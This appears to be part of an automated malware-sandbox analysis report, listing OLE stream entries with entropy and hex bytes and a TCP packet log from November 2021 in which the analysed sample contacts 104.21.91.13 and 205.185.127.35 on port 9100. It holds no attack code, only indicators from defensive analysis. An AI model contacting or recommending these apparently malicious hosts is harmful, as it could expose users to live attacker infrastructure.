                                                Stream Path: \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486, File Type: data, Stream Size: 56
                                                General
                                                Stream Path:\x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486
                                                File Type:data
                                                Stream Size:56
                                                Entropy:2.45183873051
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . # . % . ' . ) . + . - . / . 1 . 3 . 5 . 7 . 9 .
                                                Data Raw:05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 05 1f 00 21 00 23 00 25 00 27 00 29 00 2b 00 2d 00 2f 00 31 00 33 00 35 00 37 00 39 00
                                                Stream Path: \x18496\x16911\x17892\x17784\x18472, File Type: data, Stream Size: 16
                                                General
                                                Stream Path:\x18496\x16911\x17892\x17784\x18472
                                                File Type:data
                                                Stream Size:16
                                                Entropy:2.57781953111
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . ! . . .
                                                Data Raw:05 05 00 00 05 05 d2 02 01 80 01 80 21 00 00 80
                                                Stream Path: \x18496\x16918\x17191\x18468, File Type: MIPSEB Ucode, Stream Size: 14
                                                General
                                                Stream Path:\x18496\x16918\x17191\x18468
                                                File Type:MIPSEB Ucode
                                                Stream Size:14
                                                Entropy:1.95021206491
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . H . . . . .
                                                Data Raw:01 80 0e 00 00 80 00 00 48 05 00 00 00 00
                                                Stream Path: \x18496\x16925\x17915\x17884\x17404\x18472, File Type: data, Stream Size: 48
                                                General
                                                Stream Path:\x18496\x16925\x17915\x17884\x17404\x18472
                                                File Type:data
                                                Stream Size:48
                                                Entropy:3.05708832738
                                                Base64 Encoded:False
                                                Data ASCII:| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:7c 06 84 06 86 06 87 06 85 06 85 06 85 06 88 06 08 80 08 80 08 80 0d 80 00 00 00 80 ff ff ff 80 00 00 00 80 00 00 00 80 00 80 00 80 01 80 01 80
                                                Stream Path: \x18496\x17100\x16808\x15086\x18162, File Type: data, Stream Size: 12
                                                General
                                                Stream Path:\x18496\x17100\x16808\x15086\x18162
                                                File Type:data
                                                Stream Size:12
                                                Entropy:1.89624062518
                                                Base64 Encoded:False
                                                Data ASCII:> . @ . A . ? . ? . ? .
                                                Data Raw:3e 00 40 00 41 00 3f 00 3f 00 3f 00
                                                Stream Path: \x18496\x17163\x16689\x18229, File Type: data, Stream Size: 84
                                                General
                                                Stream Path:\x18496\x17163\x16689\x18229
                                                File Type:data
                                                Stream Size:84
                                                Entropy:3.09807935569
                                                Base64 Encoded:False
                                                Data ASCII:z . { . | . } . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:7a 03 7b 03 7c 03 7d 03 7e 03 7f 03 80 03 81 03 82 03 83 03 84 03 85 03 86 03 87 03 88 03 89 03 8a 03 8b 03 8c 03 8d 03 8e 03 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00 01 00
                                                Stream Path: \x18496\x17165\x16949\x17894\x17778\x18492, File Type: data, Stream Size: 12
                                                General
                                                Stream Path:\x18496\x17165\x16949\x17894\x17778\x18492
                                                File Type:data
                                                Stream Size:12
                                                Entropy:2.68872187554
                                                Base64 Encoded:False
                                                Data ASCII:! . . . . . . . . . . .
                                                Data Raw:21 00 b9 03 b9 03 00 00 f6 04 f7 04
                                                Stream Path: \x18496\x17165\x17380\x17074, File Type: data, Stream Size: 616
                                                General
                                                Stream Path:\x18496\x17165\x17380\x17074
                                                File Type:data
                                                Stream Size:616
                                                Entropy:4.09066265815
                                                Base64 Encoded:False
                                                Data ASCII:r . s . t . u . v . w . . . . . . . . . . . . . . . ! . @ . J . R . j . l . s . w . z . . . . . . . . . . . . . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . 2 . r . r . r . r . r . r . r . r . ( . r . . . r . r . . . r . r . r . r . r . r . r . r . r . r . r . r . . . r . . . . . . . . . . . . . . . . . G . . . U . . . . . i . . . . .
                                                Data Raw:72 03 73 03 74 03 75 03 76 03 77 03 cb 03 e8 03 f5 03 f9 03 fc 03 05 04 1a 04 21 04 40 04 4a 04 52 04 6a 04 6c 04 73 04 77 04 7a 04 82 04 89 04 8d 04 93 04 99 04 9f 04 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80 32 80
                                                Stream Path: \x18496\x17167\x16943, File Type: data, Stream Size: 280
                                                General
                                                Stream Path:\x18496\x17167\x16943
                                                File Type:data
                                                Stream Size:280
                                                Entropy:3.82523055055
                                                Base64 Encoded:False
                                                Data ASCII:. . # . % . ' . ) . + . - . / . 1 . 3 . 5 . 7 . 9 . . . . . # . % . ' . ) . + . - . / . 1 . 3 . 5 . 7 . 9 . ' . . . . . . . . . . . . . . . . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . 7 . L . . . . l . . . t . . G . . . . . . . 9 . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:1f 00 23 00 25 00 27 00 29 00 2b 00 2d 00 2f 00 31 00 33 00 35 00 37 00 39 00 1d 05 1f 00 23 00 25 00 27 00 29 00 2b 00 2d 00 2f 00 31 00 33 00 35 00 37 00 39 00 27 00 1f 00 0e 05 0f 05 11 05 12 05 15 05 16 05 17 05 18 05 19 05 1a 05 37 00 1b 05 1d 05 00 e6 01 80 fa b6 10 80 00 86 00 80 bd 00 00 80 c6 b7 37 80 4c e2 0e 80 f8 6c 0a 80 e7 74 11 80 47 e1 10 80 c7 db 03 80 39 03 08 80
                                                Stream Path: \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 438
                                                General
                                                Stream Path:\x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934
                                                File Type:data
                                                Stream Size:438
                                                Entropy:5.7389715587
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . E . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . & . ( . * . , . 2 . 5 . 7 . : . = . @ . E . H . K . M . O . Q . S . U . X . Z . \\ . ^ . ` . b . d . f . h . j . l . . . . . . . . . . . . . . . . . . . . . . . . . " . % . 0 . . . . . . . . . . . . . . . . . . . / . . . . . . . ! . . . - . . . . . . . + . . . ! . . . . . + . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . ) . ' . . . . . , . . . . . . . + . + . . . . . . . . . . .
                                                Data Raw:09 00 0a 00 0e 00 0f 00 10 00 12 00 13 00 14 00 17 00 18 00 19 00 1a 00 45 00 4c 00 e5 02 e7 02 f1 02 f9 02 fc 02 01 03 04 03 09 03 0c 03 12 03 15 03 18 03 1b 03 1c 03 24 03 26 03 28 03 2a 03 2c 03 32 03 35 03 37 03 3a 03 3d 03 40 03 45 03 48 03 4b 03 4d 03 4f 03 51 03 53 03 55 03 58 03 5a 03 5c 03 5e 03 60 03 62 03 64 03 66 03 68 03 6a 03 6c 03 9b 03 9f 03 a2 03 a4 03 a6 03 a7 03
                                                Stream Path: \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472, File Type: data, Stream Size: 186
                                                General
                                                Stream Path:\x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472
                                                File Type:data
                                                Stream Size:186
                                                Entropy:4.99002323032
                                                Base64 Encoded:False
                                                Data ASCII:. . . . E . L . . . . . 2 . p . r . t . u . v . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . z . . . . . . . . . . . ! . . . . . . . . . . . 4 . . . . . 3 . . . . . 7 . . . # . . . # . $ . . . ! . 6 . 5 . . . . . . . . . . . . . . . . d . . . . . . . L . . . . . . . . . K . . . 4 . 3 . . . 5 . . . . . . . . . L . . . . . . . . . . . . . . . . . . .
                                                Data Raw:09 00 0a 00 45 00 4c 00 1b 03 1c 03 32 03 70 03 72 03 74 03 75 03 76 03 77 03 99 03 9b 03 a4 03 a6 03 a7 03 ae 03 b1 03 b3 03 b6 03 ba 03 bb 03 bd 03 bf 03 c1 03 6a 04 7a 04 82 04 9f 04 00 00 00 00 00 00 21 05 00 00 00 00 00 00 00 00 00 00 34 05 00 00 00 00 33 05 00 00 00 00 37 05 00 00 23 05 bc 03 23 05 24 05 00 00 21 05 36 05 35 05 2e 05 1f 05 be 03 c0 03 bc 03 af 03 e8 83 20 83
                                                Stream Path: \x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934, File Type: data, Stream Size: 54
                                                General
                                                Stream Path:\x18496\x17547\x17906\x17910\x16693\x17651\x17768\x15518\x16924\x17972\x17512\x16934
                                                File Type:data
                                                Stream Size:54
                                                Entropy:3.91556689971
                                                Base64 Encoded:False
                                                Data ASCII:C . E . F . H . J . L . M . N . O . D . D . G . I . K . D . I . G . I . , . . . . . . . . ^ . . . X . . .
                                                Data Raw:43 00 45 00 46 00 48 00 4a 00 4c 00 4d 00 4e 00 4f 00 44 00 44 00 47 00 49 00 4b 00 44 00 49 00 47 00 49 00 2c 81 fa 80 8a 82 c2 81 20 83 5e 81 bc 82 58 82 90 81
                                                Stream Path: \x18496\x17548\x17648\x17522\x17512\x18487, File Type: data, Stream Size: 168
                                                General
                                                Stream Path:\x18496\x17548\x17648\x17522\x17512\x18487
                                                File Type:data
                                                Stream Size:168
                                                Entropy:2.6648612726
                                                Base64 Encoded:False
                                                Data ASCII:. . ! . # . % . ' . ) . + . - . / . 1 . 3 . 5 . 7 . 9 . . " . $ . & . ( . * . , . . . 0 . 2 . 4 . 6 . 8 . : . ! . ! . ! . ! . ! . ! . ! . ! . ! . ! . ! . ! . ! . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . ) . + . - . / . 1 . 3 . 5 . 7 . 9 .
                                                Data Raw:1f 00 21 00 23 00 25 00 27 00 29 00 2b 00 2d 00 2f 00 31 00 33 00 35 00 37 00 39 00 20 00 22 00 24 00 26 00 28 00 2a 00 2c 00 2e 00 30 00 32 00 34 00 36 00 38 00 3a 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 21 00 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                Stream Path: \x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522, File Type: data, Stream Size: 72
                                                General
                                                Stream Path:\x18496\x17548\x17905\x17589\x15151\x17522\x17191\x17207\x17522
                                                File Type:data
                                                Stream Size:72
                                                Entropy:3.28528343517
                                                Base64 Encoded:False
                                                Data ASCII:t . t . t . t . u . u . . . . . . . . . 2 . 3 . 6 . ; . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:74 03 74 03 74 03 74 03 75 03 75 03 05 04 05 04 05 04 2e 04 32 04 33 04 36 04 3b 04 3c 04 ec 03 06 04 11 04 a6 04 a6 04 a6 04 a6 04 aa 04 aa 04 a6 04 a6 04 a6 04 a9 04 a8 04 a8 04 a9 04 ab 04 ab 04 a7 04 a7 04 a7 04
                                                Stream Path: \x18496\x17548\x17905\x17589\x15279\x16953\x17905, File Type: data, Stream Size: 1536
                                                General
                                                Stream Path:\x18496\x17548\x17905\x17589\x15279\x16953\x17905
                                                File Type:data
                                                Stream Size:1536
                                                Entropy:4.88493439924
                                                Base64 Encoded:False
                                                Data ASCII:r . s . s . s . t . t . t . t . u . u . u . v . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . ! . ! . ! . ! . ! . ! . @ . @ . @ . J . J . J . J . J . J . R . R . R . R . R . R . R . R . R . R . R . R . R . R . R . R . R . R . R . R . j . j . j . l . l . l . s . w . w . w . z . z . z . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 03 73 03 73 03 73 03 74 03 74 03 74 03 74 03 75 03 75 03 75 03 76 03 77 03 77 03 cb 03 cb 03 cb 03 cb 03 cb 03 cb 03 e8 03 e8 03 e8 03 e8 03 e8 03 f5 03 f9 03 f9 03 f9 03 f9 03 f9 03 f9 03 fc 03 fc 03 05 04 05 04 05 04 05 04 05 04 05 04 05 04 1a 04 21 04 21 04 21 04 21 04 21 04 21 04 21 04 40 04 40 04 40 04 4a 04 4a 04 4a 04 4a 04 4a 04 4a 04 52 04 52 04 52 04 52 04 52 04 52 04
                                                Stream Path: \x18496\x17548\x17905\x17589\x18479, File Type: data, Stream Size: 7280
                                                General
                                                Stream Path:\x18496\x17548\x17905\x17589\x18479
                                                File Type:data
                                                Stream Size:7280
                                                Entropy:4.55112516549
                                                Base64 Encoded:False
                                                Data ASCII:r . r . r . r . r . r . r . r . r . r . r . r . s . s . s . s . s . s . s . t . t . t . t . t . t . t . t . t . t . t . u . u . u . u . u . u . u . u . u . u . v . v . v . v . v . v . v . v . v . w . w . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 03 72 03 72 03 72 03 72 03 72 03 72 03 72 03 72 03 72 03 72 03 72 03 73 03 73 03 73 03 73 03 73 03 73 03 73 03 74 03 74 03 74 03 74 03 74 03 74 03 74 03 74 03 74 03 74 03 74 03 75 03 75 03 75 03 75 03 75 03 75 03 75 03 75 03 75 03 75 03 76 03 76 03 76 03 76 03 76 03 76 03 76 03 76 03 76 03 77 03 77 03 77 03 77 03 77 03 77 03 77 03 77 03 cb 03 cb 03 cb 03 cb 03 cb 03 cb 03 cb 03
                                                Stream Path: \x18496\x17630\x17770\x16868\x18472, File Type: data, Stream Size: 32
                                                General
                                                Stream Path:\x18496\x17630\x17770\x16868\x18472
                                                File Type:data
                                                Stream Size:32
                                                Entropy:2.97310613006
                                                Base64 Encoded:False
                                                Data ASCII:u . u . . . U . . . . . . . . . . . . . . . . . . . . . 7 . V .
                                                Data Raw:75 06 75 06 fe 05 55 07 00 00 fe 05 00 00 00 00 02 00 00 80 01 01 00 80 00 00 00 00 37 05 56 07
                                                Stream Path: \x18496\x17740\x16680\x16951\x17551\x16879\x17768, File Type: data, Stream Size: 4
                                                General
                                                Stream Path:\x18496\x17740\x16680\x16951\x17551\x16879\x17768
                                                File Type:data
                                                Stream Size:4
                                                Entropy:1.0
                                                Base64 Encoded:False
                                                Data ASCII:! . ! .
                                                Data Raw:21 00 21 00
                                                Stream Path: \x18496\x17742\x17589\x18485, File Type: data, Stream Size: 2572
                                                General
                                                Stream Path:\x18496\x17742\x17589\x18485
                                                File Type:data
                                                Stream Size:2572
                                                Entropy:6.51935970753
                                                Base64 Encoded:False
                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . M . . . . . . . . . . . . . . . . . . . . . . . . ! . " . # . $ . % . & . ' . ( . ) . * . + . , . - . . . / . 0 . 1 . 2 . 3 . 4 . 5 . 6 . 7 . 8 . y . z . { . | . } . ~ . . . . . . . . . . . . . . . . . A . B . C . D . E . F . G . H . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . m . n . o . p .
                                                Data Raw:00 80 01 80 02 80 03 80 04 80 05 80 06 80 07 80 08 80 09 80 0a 80 0b 80 0c 80 0d 80 0e 80 0f 80 10 80 11 80 12 80 13 80 14 80 15 80 16 80 17 80 20 80 21 80 e9 83 4d 84 15 85 16 85 17 85 18 85 19 85 1a 85 1b 85 1c 85 1d 85 1e 85 1f 85 20 85 21 85 22 85 23 85 24 85 25 85 26 85 27 85 28 85 29 85 2a 85 2b 85 2c 85 2d 85 2e 85 2f 85 30 85 31 85 32 85 33 85 34 85 35 85 36 85 37 85 38 85
                                                Stream Path: \x18496\x17753\x17650\x17768\x18231, File Type: data, Stream Size: 336
                                                General
                                                Stream Path:\x18496\x17753\x17650\x17768\x18231
                                                File Type:data
                                                Stream Size:336
                                                Entropy:5.01600705417
                                                Base64 Encoded:False
                                                Data ASCII:> . . . q . . . . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . $ . & . ' . ) . + . - . / . 0 . 1 . 3 . 5 . 7 . 9 . ; . = . ? . A . B . D . F . H . J . L . N . P . R . T . V . W . Y . [ . ] . _ . a . c . d . e . f . g . h . i . j . l . n . p . q . s . v . x . z . { . } . . . ? . . . . . , . . . . . ! . u . . . . . . . . . . . . . . . . . . . . . . . ? . . . ? . z . . . . . . . . . . . . . ! . # . % . # . ( . * . . . ( . ! . . . 2 . 4 . 6 . 8 . : .
                                                Data Raw:3e 00 cc 03 71 04 c9 04 d1 04 d5 04 45 05 ea 05 fd 05 ff 05 01 06 03 06 05 06 07 06 08 06 0a 06 0c 06 0e 06 10 06 12 06 13 06 15 06 16 06 17 06 18 06 19 06 1b 06 1c 06 1e 06 20 06 22 06 24 06 26 06 27 06 29 06 2b 06 2d 06 2f 06 30 06 31 06 33 06 35 06 37 06 39 06 3b 06 3d 06 3f 06 41 06 42 06 44 06 46 06 48 06 4a 06 4c 06 4e 06 50 06 52 06 54 06 56 06 57 06 59 06 5b 06 5d 06 5f 06
                                                Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 264
                                                General
                                                Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                File Type:data
                                                Stream Size:264
                                                Entropy:3.60348374612
                                                Base64 Encoded:False
                                                Data ASCII:q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 . . . . . A . A . 3 . A . . . . . A . 3 . . . 3 . 3 . 3 . . . 3 . 3 . 3 . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ? . ? . ? . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:71 03 97 03 99 03 9b 03 9d 03 9f 03 a2 03 a4 03 a6 03 a7 03 a9 03 ac 03 ae 03 b1 03 b3 03 b6 03 b8 03 ba 03 bb 03 bd 03 bf 03 c1 03 33 80 01 80 01 80 41 81 41 80 33 80 41 80 13 80 01 80 41 80 33 80 01 80 33 80 33 81 33 81 01 80 33 80 33 80 33 80 33 80 33 80 01 80 96 03 88 03 88 03 88 03 88 03 a0 03 88 03 00 00 88 03 88 03 aa 03 7f 03 af 03 21 00 b4 03 88 03 b9 03 af 03 bc 03 be 03
                                                Stream Path: \x18496\x17998\x17512\x15799\x17636\x17203\x17073, File Type: data, Stream Size: 128
                                                General
                                                Stream Path:\x18496\x17998\x17512\x15799\x17636\x17203\x17073
                                                File Type:data
                                                Stream Size:128
                                                Entropy:3.8274882892
                                                Base64 Encoded:False
                                                Data ASCII:r . r . v . v . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:72 03 72 03 76 03 76 03 cb 03 f5 03 f5 03 f9 03 05 04 05 04 05 04 05 04 05 04 05 04 05 04 05 04 d1 02 f7 03 d1 02 7d 04 da 03 d1 02 f7 03 da 03 eb 03 06 04 09 04 0a 04 0c 04 0e 04 11 04 11 04 d1 02 fb 04 d1 02 7d 04 fa 04 d1 02 fb 04 fa 04 fd 04 02 05 00 05 fd 04 fd 04 ff 04 01 05 02 05 91 03 fc 04 91 03 91 03 fa 04 91 03 fc 04 fa 04 fe 04 03 05 91 03 fe 04 fe 04 91 03 91 03 03 05

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Nov 23, 2021 21:01:33.159884930 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.159941912 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.160187960 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.204031944 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.204061985 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.260061026 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.260174990 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.266438007 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.266452074 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.266936064 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.294101954 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.340873003 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.576648951 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.576747894 CET44349770104.21.91.13192.168.2.5
                                                Nov 23, 2021 21:01:33.576909065 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:33.733448982 CET49770443192.168.2.5104.21.91.13
                                                Nov 23, 2021 21:01:40.459253073 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:40.631084919 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:40.631541014 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:40.697380066 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:40.869102001 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:40.870124102 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:40.872293949 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.044569969 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.044732094 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.044749975 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.093597889 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.218728065 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.218923092 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.265422106 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.266196966 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.306842089 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.313761950 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.486148119 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.517884970 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.689825058 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692132950 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692239046 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692270041 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692323923 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692374945 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.692394018 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.692416906 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692470074 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692504883 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692559004 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692610979 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692646980 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.692657948 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.692701101 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692738056 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692804098 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.692883015 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.864615917 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864650965 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864666939 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864690065 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864711046 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864726067 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864747047 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864790916 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864806890 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864828110 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.864835978 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.864866972 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864880085 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.864898920 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864914894 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864934921 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.864955902 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.865014076 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.865019083 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.868017912 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868046045 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868062019 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868083000 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868108988 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868119001 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.868144035 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868171930 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868175983 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868190050 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868230104 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.868256092 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868262053 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.868277073 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868299007 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868321896 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:41.868333101 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.868374109 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:41.883245945 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.037328005 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.037414074 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.037452936 CET910049775205.185.127.35192.168.2.5
                                                Nov 23, 2021 21:01:42.037504911 CET497759100192.168.2.5205.185.127.35
                                                Nov 23, 2021 21:01:42.037545919 CET910049775205.185.127.35192.168.2.5
